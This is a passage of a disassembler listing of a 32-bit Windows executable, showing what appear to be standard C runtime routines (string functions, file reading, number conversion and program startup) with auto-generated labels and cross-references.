					; sub_403DE0+72j ...
		mov	ecx, [edx]
		mov	edi, 7EFEFEFFh
		mov	eax, ecx
		mov	esi, edi
		xor	ecx, ebx
		add	esi, eax
		add	edi, ecx
		xor	ecx, 0FFFFFFFFh
		xor	eax, 0FFFFFFFFh
		xor	ecx, edi
		xor	eax, esi
		add	edx, 4
		and	ecx, 81010100h
		jnz	short loc_403E5A
		and	eax, 81010100h
		jz	short loc_403E18
		and	eax, 1010100h
		jnz	short loc_403E54
		and	esi, 80000000h
		jnz	short loc_403E18

loc_403E54:				; CODE XREF: sub_403DE0+6Aj
					; sub_403DE0+83j ...
		pop	esi
		pop	edi

loc_403E56:				; CODE XREF: sub_403DE0+23j
		pop	ebx
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_403E5A:				; CODE XREF: sub_403DE0+5Cj
		mov	eax, [edx-4]
		cmp	al, bl
		jz	short loc_403E97
		test	al, al
		jz	short loc_403E54
		cmp	ah, bl
		jz	short loc_403E90
		test	ah, ah
		jz	short loc_403E54
		shr	eax, 10h
		cmp	al, bl
		jz	short loc_403E89
		test	al, al
		jz	short loc_403E54
		cmp	ah, bl
		jz	short loc_403E82
		test	ah, ah
		jz	short loc_403E54
		jmp	short loc_403E18
; ---------------------------------------------------------------------------

loc_403E82:				; CODE XREF: sub_403DE0+9Aj
		pop	esi
		pop	edi
		lea	eax, [edx-1]
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_403E89:				; CODE XREF: sub_403DE0+92j
		lea	eax, [edx-2]
		pop	esi
		pop	edi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_403E90:				; CODE XREF: sub_403DE0+87j
		lea	eax, [edx-3]
		pop	esi
		pop	edi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_403E97:				; CODE XREF: sub_403DE0+7Fj
		lea	eax, [edx-4]
		pop	esi
		pop	edi
		pop	ebx
		retn
sub_403DE0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403EA0	proc near		; CODE XREF: sub_4182F6+104p
					; sub_4184BD+D9p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_8]
		push	edi
		test	ecx, ecx
		jz	loc_403F3F
		push	esi
		push	ebx
		mov	ebx, ecx
		mov	esi, [esp+0Ch+arg_4]
		test	esi, 3
		mov	edi, [esp+0Ch+arg_0]
		jnz	short loc_403ECC
		shr	ecx, 2
		jnz	loc_403F4F
		jmp	short loc_403EF3
; ---------------------------------------------------------------------------

loc_403ECC:				; CODE XREF: sub_403EA0+1Fj
					; sub_403EA0+45j
		mov	al, [esi]
		add	esi, 1
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jz	short loc_403F06
		test	al, al
		jz	short loc_403F0E
		test	esi, 3
		jnz	short loc_403ECC
		mov	ebx, ecx
		shr	ecx, 2
		jnz	short loc_403F4F

loc_403EEE:				; CODE XREF: sub_403EA0+ADj
		and	ebx, 3
		jz	short loc_403F06

loc_403EF3:				; CODE XREF: sub_403EA0+2Aj
					; sub_403EA0+64j
		mov	al, [esi]
		add	esi, 1
		mov	[edi], al
		add	edi, 1
		test	al, al
		jz	short loc_403F38
		sub	ebx, 1
		jnz	short loc_403EF3

loc_403F06:				; CODE XREF: sub_403EA0+39j
					; sub_403EA0+51j
		mov	eax, [esp+0Ch+arg_0]
		pop	ebx
		pop	esi
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403F0E:				; CODE XREF: sub_403EA0+3Dj
		test	edi, 3
		jz	short loc_403F2C

loc_403F16:				; CODE XREF: sub_403EA0+8Aj
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jz	loc_403FBC
		test	edi, 3
		jnz	short loc_403F16

loc_403F2C:				; CODE XREF: sub_403EA0+74j
		mov	ebx, ecx
		shr	ecx, 2
		jnz	short loc_403FA7

loc_403F33:				; CODE XREF: sub_403EA0+9Bj
					; sub_403EA0+116j
		mov	[edi], al
		add	edi, 1

loc_403F38:				; CODE XREF: sub_403EA0+5Fj
		sub	ebx, 1
		jnz	short loc_403F33
		pop	ebx
		pop	esi

loc_403F3F:				; CODE XREF: sub_403EA0+7j
		mov	eax, [esp+4+arg_0]
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403F45:				; CODE XREF: sub_403EA0+C7j
					; sub_403EA0+DFj
		mov	[edi], edx
		add	edi, 4
		sub	ecx, 1
		jz	short loc_403EEE

loc_403F4F:				; CODE XREF: sub_403EA0+24j
					; sub_403EA0+4Cj
		mov	edx, 7EFEFEFFh
		mov	eax, [esi]
		add	edx, eax
		xor	eax, 0FFFFFFFFh
		xor	eax, edx
		mov	edx, [esi]
		add	esi, 4
		test	eax, 81010100h
		jz	short loc_403F45
		test	dl, dl
		jz	short loc_403F99
		test	dh, dh
		jz	short loc_403F8F
		test	edx, 0FF0000h
		jz	short loc_403F85
		test	edx, 0FF000000h
		jnz	short loc_403F45
		mov	[edi], edx
		jmp	short loc_403F9D
; ---------------------------------------------------------------------------

loc_403F85:				; CODE XREF: sub_403EA0+D7j
		and	edx, 0FFFFh
		mov	[edi], edx
		jmp	short loc_403F9D
; ---------------------------------------------------------------------------

loc_403F8F:				; CODE XREF: sub_403EA0+CFj
		and	edx, 0FFh
		mov	[edi], edx
		jmp	short loc_403F9D
; ---------------------------------------------------------------------------

loc_403F99:				; CODE XREF: sub_403EA0+CBj
		xor	edx, edx
		mov	[edi], edx

loc_403F9D:				; CODE XREF: sub_403EA0+E3j
					; sub_403EA0+EDj ...
		add	edi, 4
		xor	eax, eax
		sub	ecx, 1
		jz	short loc_403FB3

loc_403FA7:				; CODE XREF: sub_403EA0+91j
		xor	eax, eax

loc_403FA9:				; CODE XREF: sub_403EA0+111j
		mov	[edi], eax
		add	edi, 4
		sub	ecx, 1
		jnz	short loc_403FA9

loc_403FB3:				; CODE XREF: sub_403EA0+105j
		and	ebx, 3
		jnz	loc_403F33

loc_403FBC:				; CODE XREF: sub_403EA0+7Ej
		mov	eax, [esp+0Ch+arg_0]
		pop	ebx
		pop	esi
		pop	edi
		retn
sub_403EA0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403FC4	proc near		; CODE XREF: sub_4182F6+1Dp
					; sub_4182F6+5Ap ...

var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= byte ptr -24h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		mov	[ebp+var_2C], eax
		call	sub_40595D
		push	8
		pop	ecx
		mov	[ebp+var_28], eax
		xor	eax, eax
		lea	edi, [ebp+var_24]
		push	7
		rep stosd
		pop	edi

loc_403FF5:				; CODE XREF: sub_403FC4+4Aj
		mov	dl, [esi]
		movzx	ecx, dl
		mov	eax, ecx
		and	ecx, edi
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+var_24]
		or	[eax], bl
		inc	esi
		test	dl, dl
		jnz	short loc_403FF5
		mov	edx, [ebp+var_2C]
		test	edx, edx
		jnz	short loc_404024
		mov	eax, [ebp+var_28]
		mov	edx, [eax+18h]
		jmp	short loc_404024
; ---------------------------------------------------------------------------

loc_40401F:				; CODE XREF: sub_403FC4+77j
		test	al, al
		jz	short loc_40403D
		inc	edx

loc_404024:				; CODE XREF: sub_403FC4+51j
					; sub_403FC4+59j
		mov	al, [edx]
		movzx	esi, al
		xor	ebx, ebx
		mov	ecx, esi
		and	ecx, edi
		inc	ebx
		shl	ebx, cl
		shr	esi, 3
		mov	cl, [ebp+esi+var_24]
		test	bl, cl
		jnz	short loc_40401F

loc_40403D:				; CODE XREF: sub_403FC4+5Dj
		mov	ebx, edx
		jmp	short loc_404059
; ---------------------------------------------------------------------------

loc_404041:				; CODE XREF: sub_403FC4+98j
		movzx	esi, byte ptr [edx]
		xor	eax, eax
		mov	ecx, esi
		and	ecx, edi
		inc	eax
		shl	eax, cl
		shr	esi, 3
		mov	cl, [ebp+esi+var_24]
		test	al, cl
		jnz	short loc_404060
		inc	edx

loc_404059:				; CODE XREF: sub_403FC4+7Bj
		cmp	byte ptr [edx],	0
		jnz	short loc_404041
		jmp	short loc_404064
; ---------------------------------------------------------------------------

loc_404060:				; CODE XREF: sub_403FC4+92j
		mov	byte ptr [edx],	0
		inc	edx

loc_404064:				; CODE XREF: sub_403FC4+9Aj
		mov	eax, [ebp+var_28]
		mov	ecx, [ebp+var_4]
		mov	[eax+18h], edx
		mov	eax, ebx
		sub	eax, edx
		neg	eax
		sbb	eax, eax
		pop	edi
		and	eax, ebx
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_403FC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_404083	proc near		; CODE XREF: sub_41BD8A+70p
					; sub_41BD8A+160p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_4040AA
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_4040AA:				; CODE XREF: sub_404083+9j
		mov	eax, [eax+0Ch]
		and	eax, 10h
		pop	esi
		retn
sub_404083	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4040B2	proc near		; CODE XREF: sub_404248+A1p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_8]
		test	edi, edi
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_4], eax
		jz	loc_404202
		cmp	[ebp+arg_C], 0
		jz	loc_404202
		imul	edi, [ebp+arg_C]
		mov	esi, [ebp+arg_10]
		test	word ptr [esi+0Ch], 10Ch
		mov	[ebp+var_10], edi
		mov	ebx, edi
		jz	short loc_4040F8
		mov	eax, [esi+18h]
		mov	[ebp+var_C], eax
		jmp	short loc_4040FF
; ---------------------------------------------------------------------------

loc_4040F8:				; CODE XREF: sub_4040B2+3Cj
		mov	[ebp+var_C], 1000h

loc_4040FF:				; CODE XREF: sub_4040B2+44j
		test	edi, edi
		jz	loc_4041CE

loc_404107:				; CODE XREF: sub_4040B2+116j
		test	word ptr [esi+0Ch], 10Ch
		jz	short loc_404150
		mov	eax, [esi+4]
		test	eax, eax
		jz	short loc_404150
		jl	loc_404233
		cmp	ebx, eax
		mov	edi, ebx
		jb	short loc_404124
		mov	edi, eax

loc_404124:				; CODE XREF: sub_4040B2+6Ej
		cmp	edi, [ebp+var_4]
		ja	loc_4041D3
		push	edi
		push	dword ptr [esi]
		push	[ebp+var_4]
		push	[ebp+var_8]
		call	sub_403500
		sub	[esi+4], edi
		add	[esi], edi
		add	[ebp+var_8], edi
		sub	ebx, edi
		add	esp, 10h
		sub	[ebp+var_4], edi
		mov	edi, [ebp+var_10]
		jmp	short loc_4041C6
; ---------------------------------------------------------------------------

loc_404150:				; CODE XREF: sub_4040B2+5Bj
					; sub_4040B2+62j
		cmp	ebx, [ebp+var_C]
		jb	short loc_40419E
		cmp	[ebp+var_C], 0
		mov	eax, ebx
		jz	short loc_404166
		xor	edx, edx
		div	[ebp+var_C]
		mov	eax, ebx
		sub	eax, edx

loc_404166:				; CODE XREF: sub_4040B2+A9j
		cmp	eax, [ebp+var_4]
		ja	loc_404209
		push	eax
		push	[ebp+var_8]
		push	esi
		call	sub_408FE0
		pop	ecx
		push	eax
		call	sub_40A90F
		add	esp, 0Ch
		test	eax, eax
		jz	loc_404242
		cmp	eax, 0FFFFFFFFh
		jz	loc_404233
		add	[ebp+var_8], eax
		sub	ebx, eax
		sub	[ebp+var_4], eax
		jmp	short loc_4041C6
; ---------------------------------------------------------------------------

loc_40419E:				; CODE XREF: sub_4040B2+A1j
		push	esi
		call	sub_40A24D
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	loc_404237
		cmp	[ebp+var_4], 0
		jz	short loc_404209
		mov	ecx, [ebp+var_8]
		inc	[ebp+var_8]
		mov	[ecx], al
		mov	eax, [esi+18h]
		dec	ebx
		dec	[ebp+var_4]
		mov	[ebp+var_C], eax

loc_4041C6:				; CODE XREF: sub_4040B2+9Cj
					; sub_4040B2+EAj
		test	ebx, ebx
		jnz	loc_404107

loc_4041CE:				; CODE XREF: sub_4040B2+4Fj
		mov	eax, [ebp+arg_C]
		jmp	short loc_404204
; ---------------------------------------------------------------------------

loc_4041D3:				; CODE XREF: sub_4040B2+75j
		xor	esi, esi
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_4041EA
		push	[ebp+arg_4]
		push	esi
		push	[ebp+arg_0]
		call	sub_408130
		add	esp, 0Ch

loc_4041EA:				; CODE XREF: sub_4040B2+127j
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 22h
		push	esi

loc_4041FA:				; CODE XREF: sub_4040B2+17Fj
		call	sub_4034C7
		add	esp, 14h

loc_404202:				; CODE XREF: sub_4040B2+1Aj
					; sub_4040B2+24j
		xor	eax, eax

loc_404204:				; CODE XREF: sub_4040B2+11Fj
					; sub_4040B2+18Ej
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_404209:				; CODE XREF: sub_4040B2+B7j
					; sub_4040B2+100j
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_40421F
		push	[ebp+arg_4]
		push	0
		push	[ebp+arg_0]
		call	sub_408130
		add	esp, 0Ch

loc_40421F:				; CODE XREF: sub_4040B2+15Bj
		call	sub_405D93
		mov	dword ptr [eax], 22h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		jmp	short loc_4041FA
; ---------------------------------------------------------------------------

loc_404233:				; CODE XREF: sub_4040B2+64j
					; sub_4040B2+DCj
		or	dword ptr [esi+0Ch], 20h

loc_404237:				; CODE XREF: sub_4040B2+F6j
					; sub_4040B2+194j
		mov	eax, edi
		sub	eax, ebx
		xor	edx, edx
		div	[ebp+arg_8]
		jmp	short loc_404204
; ---------------------------------------------------------------------------

loc_404242:				; CODE XREF: sub_4040B2+D3j
		or	dword ptr [esi+0Ch], 10h
		jmp	short loc_404237
sub_4040B2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404248	proc near		; CODE XREF: sub_40430F+12p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	0Ch
		push	offset dword_422958
		call	__SEH_prolog4
		xor	esi, esi
		mov	[ebp+var_1C], esi
		mov	ebx, [ebp+arg_8]
		cmp	ebx, esi
		jz	short loc_40428B
		mov	edi, [ebp+arg_C]
		cmp	edi, esi
		jz	short loc_40428B
		xor	eax, eax
		cmp	[ebp+arg_0], esi
		setnz	al
		cmp	eax, esi
		jnz	short loc_404293

loc_404273:				; CODE XREF: sub_404248+7Aj
					; sub_404248+88j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4034C7
		add	esp, 14h

loc_40428B:				; CODE XREF: sub_404248+16j
					; sub_404248+1Dj
		xor	eax, eax

loc_40428D:				; CODE XREF: sub_404248+BBj
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_404293:				; CODE XREF: sub_404248+29j
		cmp	[ebp+arg_10], esi
		jz	short loc_4042A3
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ebx
		cmp	edi, eax
		jbe	short loc_4042D2

loc_4042A3:				; CODE XREF: sub_404248+4Ej
		cmp	[ebp+arg_4], 0FFFFFFFFh
		jz	short loc_4042B8
		push	[ebp+arg_4]
		push	esi
		push	[ebp+arg_0]
		call	sub_408130
		add	esp, 0Ch

loc_4042B8:				; CODE XREF: sub_404248+5Fj
		xor	eax, eax
		cmp	[ebp+arg_10], esi
		setnz	al
		cmp	eax, esi
		jz	short loc_404273
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ebx
		cmp	eax, edi
		sbb	eax, eax
		inc	eax
		jz	short loc_404273

loc_4042D2:				; CODE XREF: sub_404248+59j
		push	[ebp+arg_10]
		call	sub_40871B
		pop	ecx
		mov	[ebp+ms_exc.disabled], esi
		push	[ebp+arg_10]
		push	edi
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_4040B2
		add	esp, 14h
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_404305
		mov	eax, [ebp+var_1C]
		jmp	short loc_40428D
sub_404248	endp


; =============== S U B	R O U T	I N E =======================================



sub_404305	proc near		; CODE XREF: sub_404248+B3p
					; DATA XREF: jlrllt49:00422970o
		push	dword ptr [ebp+18h]
		call	sub_40876D
		pop	ecx
		retn
sub_404305	endp


; =============== S U B	R O U T	I N E =======================================



sub_40430F	proc near		; CODE XREF: sub_41BD8A+D6p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	[esp+arg_C]
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	0FFFFFFFFh
		push	[esp+10h+arg_0]
		call	sub_404248
		add	esp, 14h
		retn
sub_40430F	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404330	proc near		; CODE XREF: sub_414954+1A7p
					; sub_414954+1DCp ...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		mov	edi, [ebp+arg_0]
		mov	edx, edi
		mov	esi, edi
		xor	eax, eax
		or	ecx, 0FFFFFFFFh
		repne scasb
		cmp	ecx, 0FFFFFFFEh
		jz	short loc_40435F
		sub	edi, 2

loc_40434B:				; CODE XREF: sub_404330+2Dj
		cmp	esi, edi
		jnb	short loc_40435F
		mov	ah, [esi]
		mov	al, [edi]
		mov	[esi], al
		mov	[edi], ah
		add	esi, 1
		sub	edi, 1
		jmp	short loc_40434B
; ---------------------------------------------------------------------------

loc_40435F:				; CODE XREF: sub_404330+16j
					; sub_404330+1Dj
		mov	eax, edx
		pop	esi
		pop	edi
		leave
		retn
sub_404330	endp


; =============== S U B	R O U T	I N E =======================================



sub_404365	proc near		; CODE XREF: sub_404376j
					; sub_410870+35p

arg_0		= dword	ptr  4

		push	0Ah
		push	0
		push	[esp+8+arg_0]
		call	sub_40AC16
		add	esp, 0Ch
		retn
sub_404365	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_404376	proc near		; CODE XREF: sub_401EF9+9Dp
					; sub_401EF9+ACp ...
		jmp	sub_404365
sub_404376	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_404380	proc near		; CODE XREF: sub_41B423+513p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= qword	ptr  4

		cmp	dword_4376D8, 0
		jz	sub_40AF03
		sub	esp, 8
		stmxcsr	[esp+8+var_4]
		mov	eax, [esp+8+var_4]
		and	eax, 1F80h
		cmp	eax, 1F80h
		jnz	short loc_4043B4
		fnstcw	word ptr [esp+8+var_8]
		mov	ax, word ptr [esp+8+var_8]
		and	ax, 7Fh
		cmp	ax, 7Fh

loc_4043B4:				; CODE XREF: sub_404380+23j
		lea	esp, [esp+8]
		jnz	sub_40AF03
		jmp	short $+2
		movq	xmm0, [esp+arg_0]
		movapd	xmm2, oword ptr	ds:oword_41E3C0
		movapd	xmm1, xmm0
		movapd	xmm7, xmm0
		psrlq	xmm0, 34h
		movd	eax, xmm0
		andpd	xmm0, oword ptr	ds:oword_41E3E0
		psubd	xmm2, xmm0
		psrlq	xmm1, xmm2
		test	eax, 800h
		jz	short loc_404442
		cmp	eax, 0BFFh
		jl	short loc_40447A
		psllq	xmm1, xmm2
		cmp	eax, 0C32h
		jg	short loc_404413
		movq	[esp+arg_0], xmm1
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_404413:				; CODE XREF: sub_404380+86j
					; sub_404380+E1j
		ucomisd	xmm7, xmm7
		jnp	short loc_40443D
		mov	edx, 3ECh
		sub	esp, 10h
		mov	[esp+10h+var_4], edx
		mov	edx, esp
		add	edx, 14h
		mov	[esp+10h+var_8], edx
		mov	[esp+10h+var_C], edx
		mov	[esp+10h+var_10], edx
		call	sub_40AC3F
		add	esp, 10h

loc_40443D:				; CODE XREF: sub_404380+97j
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_404442:				; CODE XREF: sub_404380+74j
		movq	xmm0, [esp+arg_0]
		psllq	xmm1, xmm2
		movapd	xmm3, xmm0
		cmppd	xmm0, xmm1, 6
		cmp	eax, 3FFh
		jl	short loc_404481
		cmp	eax, 432h
		jg	short loc_404413
		andpd	xmm0, oword ptr	ds:oword_41E3B0
		addsd	xmm1, xmm0
		movq	[esp+arg_0], xmm1
		fld	[esp+arg_0]
		retn
; ---------------------------------------------------------------------------

loc_40447A:				; CODE XREF: sub_404380+7Bj
		fld	ds:dbl_41E3F0
		retn
; ---------------------------------------------------------------------------

loc_404481:				; CODE XREF: sub_404380+DAj
		cmppd	xmm3, oword ptr	ds:oword_41E3D0, 6
		andpd	xmm3, oword ptr	ds:oword_41E3B0
		movq	[esp+arg_0], xmm3
		fld	[esp+arg_0]
		retn
sub_404380	endp


; =============== S U B	R O U T	I N E =======================================



sub_40449D	proc near		; CODE XREF: .text:00404542p
					; .text:004045DFp ...

arg_0		= dword	ptr  4

		cmp	dword_427DFC, 1
		jnz	short loc_4044AB
		call	sub_40A214

loc_4044AB:				; CODE XREF: sub_40449D+7j
		push	[esp+arg_0]
		call	sub_40A074
		push	0FFh
		call	sub_407E67
		pop	ecx
		pop	ecx
		retn
sub_40449D	endp


; =============== S U B	R O U T	I N E =======================================



sub_4044C1	proc near		; CODE XREF: .text:004045C7p
		cmp	word ptr ds:400000h, 5A4Dh
		jnz	short loc_4044FF
		mov	eax, ds:40003Ch
		cmp	dword ptr [eax+400000h], 4550h
		jnz	short loc_4044FF
		cmp	word ptr [eax+400018h],	10Bh
		jnz	short loc_4044FF
		cmp	dword ptr [eax+400074h], 0Eh
		jbe	short loc_4044FF
		xor	ecx, ecx
		cmp	[eax+4000E8h], ecx
		setnz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_4044FF:				; CODE XREF: sub_4044C1+9j
					; sub_4044C1+1Aj ...
		xor	eax, eax
		retn
sub_4044C1	endp

; ---------------------------------------------------------------------------

loc_404502:				; CODE XREF: .text:004046E7j
		push	60h
		push	offset dword_422978
		call	__SEH_prolog4
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-70h]
		push	eax
		call	ds:off_41E1A8
		mov	dword ptr [ebp-4], 0FFFFFFFEh
		mov	edi, 94h
		push	edi
		push	0
		mov	ebx, ds:dword_41E0FC
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41E110	; RtlAllocateHeap
		mov	esi, eax
		test	esi, esi
		jnz	short loc_40454D
		push	12h
		call	sub_40449D
		pop	ecx
		jmp	loc_4046D7
; ---------------------------------------------------------------------------

loc_40454D:				; CODE XREF: .text:0040453Ej
		mov	[esi], edi
		push	esi
		call	ds:dword_41E068	; GetVersionExA
		push	esi
		push	0
		test	eax, eax
		jnz	short loc_40456B
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41E108	; RtlFreeHeap
		jmp	loc_4046D7
; ---------------------------------------------------------------------------

loc_40456B:				; CODE XREF: .text:0040455Bj
		mov	eax, [esi+10h]
		mov	[ebp-20h], eax
		mov	eax, [esi+4]
		mov	[ebp-24h], eax
		mov	eax, [esi+8]
		mov	[ebp-28h], eax
		mov	edi, [esi+0Ch]
		and	edi, 7FFFh
		call	ebx	; GetProcessHeap
		push	eax
		call	ds:dword_41E108	; RtlFreeHeap
		mov	esi, [ebp-20h]
		cmp	esi, 2
		jz	short loc_40459D
		or	edi, 8000h

loc_40459D:				; CODE XREF: .text:00404595j
		mov	ecx, [ebp-24h]
		mov	eax, ecx
		shl	eax, 8
		mov	edx, [ebp-28h]
		add	eax, edx
		mov	dword_4282D8, esi
		mov	dword_4282E0, eax
		mov	dword_4282E4, ecx
		mov	dword_4282E8, edx
		mov	dword_4282DC, edi
		call	sub_4044C1
		mov	[ebp-20h], eax
		xor	ebx, ebx
		inc	ebx
		push	ebx
		call	sub_406043
		pop	ecx
		test	eax, eax
		jnz	short loc_4045E5
		push	1Ch
		call	sub_40449D
		pop	ecx

loc_4045E5:				; CODE XREF: .text:004045DBj
		call	sub_405A96
		test	eax, eax
		jnz	short loc_4045F6
		push	10h
		call	sub_40449D
		pop	ecx

loc_4045F6:				; CODE XREF: .text:004045ECj
		call	sub_40B602
		mov	[ebp-4], ebx
		call	sub_408DA0
		test	eax, eax
		jge	short loc_40460F
		push	1Bh
		call	sub_407E1D
		pop	ecx

loc_40460F:				; CODE XREF: .text:00404605j
		call	ds:off_41E1A4
		mov	dword_438858, eax
		call	sub_40B4CD
		mov	dword_427DF4, eax
		call	sub_40B414
		test	eax, eax
		jge	short loc_404635
		push	8
		call	sub_407E1D
		pop	ecx

loc_404635:				; CODE XREF: .text:0040462Bj
		call	sub_40B1A1
		test	eax, eax
		jge	short loc_404646
		push	9
		call	sub_407E1D
		pop	ecx

loc_404646:				; CODE XREF: .text:0040463Cj
		push	ebx
		call	sub_407F39
		pop	ecx
		test	eax, eax
		jz	short loc_404658
		push	eax
		call	sub_407E1D
		pop	ecx

loc_404658:				; CODE XREF: .text:0040464Fj
		call	sub_40B144
		test	[ebp-44h], bl
		jz	short loc_404668
		movzx	ecx, word ptr [ebp-40h]
		jmp	short loc_40466B
; ---------------------------------------------------------------------------

loc_404668:				; CODE XREF: .text:00404660j
		push	0Ah
		pop	ecx

loc_40466B:				; CODE XREF: .text:00404666j
		push	ecx
		push	eax
		push	0
		push	400000h
		call	sub_41C7BA
		mov	[ebp-1Ch], eax
		cmp	dword ptr [ebp-20h], 0
		jnz	short loc_404688
		push	eax
		call	sub_408099

loc_404688:				; CODE XREF: .text:00404680j
		call	sub_4080BB
		jmp	short loc_4046BD
; ---------------------------------------------------------------------------
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-2Ch], ecx
		push	eax
		push	ecx
		call	sub_40AFD5
		pop	ecx
		pop	ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	eax, [ebp-2Ch]
		mov	[ebp-1Ch], eax
		cmp	dword ptr [ebp-20h], 0
		jnz	short loc_4046B8
		push	eax
		call	sub_4080AA

loc_4046B8:				; CODE XREF: .text:004046B0j
		call	sub_4080CA

loc_4046BD:				; CODE XREF: .text:0040468Dj
		mov	dword ptr [ebp-4], 0FFFFFFFEh
		mov	eax, [ebp-1Ch]
		jmp	short loc_4046DC
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	dword ptr [ebp-4], 0FFFFFFFEh

loc_4046D7:				; CODE XREF: .text:00404548j
					; .text:00404566j
		mov	eax, 0FFh

loc_4046DC:				; CODE XREF: .text:004046C7j
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_4046E2:				; CODE XREF: y2kk37jd:00457542j
		call	sub_40B64A
		jmp	loc_404502
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4046F0	proc near		; CODE XREF: sub_40319A+16p
					; sub_403200+21p ...

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		test	ecx, 3
		jz	short loc_404720

loc_4046FC:				; CODE XREF: sub_4046F0+1Bj
		mov	al, [ecx]
		add	ecx, 1
		test	al, al
		jz	short loc_404753
		test	ecx, 3
		jnz	short loc_4046FC
		add	eax, 0
		lea	esp, [esp+0]
		lea	esp, [esp+0]

loc_404720:				; CODE XREF: sub_4046F0+Aj
					; sub_4046F0+46j ...
		mov	eax, [ecx]
		mov	edx, 7EFEFEFFh
		add	edx, eax
		xor	eax, 0FFFFFFFFh
		xor	eax, edx
		add	ecx, 4
		test	eax, 81010100h
		jz	short loc_404720
		mov	eax, [ecx-4]
		test	al, al
		jz	short loc_404771
		test	ah, ah
		jz	short loc_404767
		test	eax, 0FF0000h
		jz	short loc_40475D
		test	eax, 0FF000000h
		jz	short loc_404753
		jmp	short loc_404720
; ---------------------------------------------------------------------------

loc_404753:				; CODE XREF: sub_4046F0+13j
					; sub_4046F0+5Fj
		lea	eax, [ecx-1]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_40475D:				; CODE XREF: sub_4046F0+58j
